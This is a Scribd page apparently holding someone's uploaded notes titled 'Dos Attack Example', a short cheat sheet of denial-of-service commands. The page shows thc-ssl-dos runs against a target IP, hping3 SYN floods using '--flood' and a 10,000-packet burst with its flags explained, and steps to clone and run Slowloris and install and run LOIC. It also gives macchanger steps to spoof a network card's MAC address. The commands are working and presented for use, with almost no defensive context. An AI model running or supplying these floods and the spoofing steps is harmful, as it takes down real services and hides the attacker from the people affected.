0% found this document useful (0 votes)
4 views2 pages

Dos Attack Example

The document provides instructions for using various network attack tools such as thc-ssl-dos and hping3, including commands for executing denial of service attacks and manipulating network interfaces. It also includes links to download tools like Slowloris and LOIC, along with installation commands for necessary dependencies. Additionally, it mentions changing MAC addresses and verifying network interface status.

Uploaded by

it
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
4 views2 pages

Dos Attack Example

The document provides instructions for using various network attack tools such as thc-ssl-dos and hping3, including commands for executing denial of service attacks and manipulating network interfaces. It also includes links to download tools like Slowloris and LOIC, along with installation commands for necessary dependencies. Additionally, it mentions changing MAC addresses and verifying network interface status.

Uploaded by

it
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd

sudo apt update

sudo apt install thc-ssl-dos

sudo thc-ssl-dos <target_ip> (use 2nd command)

OR
sudo thc-ssl-dos <target_ip> - - accept

sudo hping3 --icmp --count 10 [Link]


hping3 --icmp --count 10 [target IP address]
hping3 -S [target IP address] -p [target port] --flood
hping3 -S [target IP address] -p ++1

========

hping3 -S -p 80 -s 1337 -c 10000 <target_ip>

● -S: SYN flag.


● -p 80: Target port (HTTP in this case).
● -s 1337: Source port.
● -c 10000: Number of packets to send.
● <target_ip>: The IP address of the target.

=====================================
[Link]
git clone [Link]
cd slowloris
python3 [Link] [Link]
===============
# Identify the interface
ip link

# Bring down the interface


sudo ifconfig eth0 down

# Change the MAC address


sudo macchanger -m 00:11:22:33:44:55 eth0

# Bring up the interface


sudo ifconfig eth0 up
# Verify the change
ip link show eth0
=========================
[Link]

[Link]
(download loic and extract this to desktop)
sudo apt-get install mono-complete
sudo apt-get install nload
mono [Link]

[Link]
%E2%80%99s-dictionary-cyber-security-terminologies/

You might also like